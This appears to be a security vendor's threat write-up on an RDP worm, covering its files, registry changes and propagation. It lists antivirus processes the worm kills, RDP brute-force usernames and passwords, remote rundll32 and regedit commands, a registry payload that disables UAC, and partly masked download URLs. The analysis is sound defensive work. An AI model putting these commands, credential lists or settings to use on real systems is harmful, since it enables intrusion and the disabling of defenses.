This worm uses Remote Desktop Protocol (RDP) for its propagation routines.
To get a one-glance comprehensive view of the behavior of this Worm, refer to the Threat Diagram shown below.
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be dropped by other malware.
It deletes the initially executed copy of itself.
File size: 7,184 bytes
File type: DLL
Memory resident: Yes
Initial samples received date: 30 Aug 2011
Payload: Terminates processes
Arrival Details
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It may be dropped by the following malware:
Installation
This worm drops the following copies of itself into the affected system:
- %Windows%\clb.dl
- %Windows%\Offline Web Pages\cache.txt
(Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.)
It drops the following file(s)/component(s):
(Note: %System% is the Windows system folder, which is usually C:\Windows\System on Windows 98 and ME, C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)
It drops the following non-malicious file:
- %Windows%\Offline Web Pages\%yyyy-mm-dd%
(Note: %Windows% is the Windows folder, which is usually C:\Windows or C:\WINNT.)
It injects itself into the following processes as part of its memory residency routine:
Other System Modifications
This worm adds the following registry entries as part of its installation routine:
HKEY_LOCAL_MACHINE\SYSTEM\WPA
it = "{hex values}"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
id = "1293D1C15VAVUJTN"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
ie = "%current folder%\{malware name}.exe"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
md = "{garbage code}"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
sn = "6to4"
HKEY_LOCAL_MACHINE\SYSTEM\WPA
sr = "Sens"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Windows
NoPopUpsOnBoot = "1"
Process Termination
This worm terminates processes or services that contain any of the following strings if found running in the affected system's memory:
- ACAAS
- ArcaConfSV
- AvastSvc
- FPAVServer
- FortiScand
- GDFwSvc
- K7RTScan
- KVSrvXP
- MPSvc
- MsMpEng
- NSESVC.EXE
- PavFnSvr
- RavMonD
- SavService
- SpySweeper
- Vba32Ldr
- a2service
- avgwdsvc
- avpmapp
- ccSvcHst
- cmdagent
- coreServiceShell
- freshclam
- fsdfwd
- knsdave
- kxescore
- mcshield
- scanwscs
- vsserv
Other Details
This worm deletes the initially executed copy of itself
NOTES:
This worm creates a backup copy of its dropped file as %Windows%\clb.dll.bak.
The file %system%\clb.dll is a legitimate file which is used by regedit.exe. That is why the copy of this malware is placed in %Windows% directory is to trick regedit.exe that the dropped file is the component that it needs. Therefore, regedit.exe loads the malicious clb.dll into the system.
It listens to port 3389/TCP, the port for RDP, for possible enabled Remote Desktop.
This worm searches for Remote Desktop Servers, and tries to log-in as Administrator using the following usernames:
- actuser
- admin
- admin1
- admin123
- admin2
- administrator
- aspnet
- backup
- computer
- console
- david
- dragon
- guest
- owner
- princess
- server
- support
- support_388945a0
- test1
- test2
- test3
- user1
- user2
- user3
- user4
- user5
It also tries the following passwords:
- !@#$%
- $1234
- %u%111111
- %u%12
- %u%123
- %u%1234
- %u%123456
- 000000
- 111111
- 1111111
- 111222
- 112233
- 11223344
- 121212
- 123123
- 123321
- 12344321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1314520
- 159357
- 168168
- 1q2w3e
- 1qaz2wsx
- 22222222
- 31415926
- 520520
- 654321
- 666666
- 7777777
- 77777777
- 789456
- 888888
- 88888888
- 987654
- 987654321
- 999999
- 1234
- PASSWORD
- Password
- Z1234
- abc123
- abcd1234
- actuser
- admin
- admin1
- admin123
- admin2
- administrator
- aspnet
- backup
- computer
- console
- david
- dragon
- guest
- iloveyou
- letmein
- owner
- password
- princess
- qazwsx
- rockyou
- secret
- server
- super
- support
- support_388945a0
- test1
- test2
- test3
- user1
- user2
- user3
- user4
- user5
- zxcvbnm
Once remotely connected, this worm copies the file %Windows%\clb.dll as a .DLL to a directory in a temporary drive A: using the following remote command:- rundll32 \\tsclient\a\a.dll a
It also creates the r.reg on the said path with the following contents using the remote command regedit /s \\tsclient\a\r.reg:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
ConsentPromptBehaviorAdmin=0
EnableLUA=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
c:\\windows\\system32\\rundll32.exe=RUNASADMIN
d:\\windows\\system32\\rundll32.exe=RUNASADMIN
e:\\windows\\system32\\rundll32.exe=RUNASADMIN
f:\\windows\\system32\\rundll32.exe=RUNASADMIN
g:\\windows\\system32\\rundll32.exe=RUNASADMIN
h:\\windows\\system32\\rundll32.exe=RUNASADMIN
i:\\windows\\system32\\rundll32.exe=RUNASADMIN
c:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
d:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
e:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
f:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
g:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
h:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
i:\\windows\\SysWOW64\\rundll32.exe=RUNASADMIN
c:\\winnt\\system32\\rundll32.exe=RUNASADMIN
c:\\win2008\\system32\\rundll32.exe=RUNASADMIN
c:\\win2k8\\system32\\rundll32.exe=RUNASADMIN
c:\\win7\\system32\\rundll32.exe=RUNASADMIN
c:\\windows7\\system32\\rundll32.exe=RUNASADMIN
This worm downloads an updated copy of itself using the link http:\\%domain%\160.rar with the following domains below:- {BLOCKED}r.{BLOCKED}o.be
- {BLOCKED}r.{BLOCKED}o.cc
- {BLOCKED}r.info
- {BLOCKED}r.net
- {BLOCKED}l.{BLOCKED}o.be
- {BLOCKED}l.{BLOCKED}o.cc
- {BLOCKED}l.net
- {BLOCKED}0.{BLOCKED}.38.82
Connect with us on
| | | |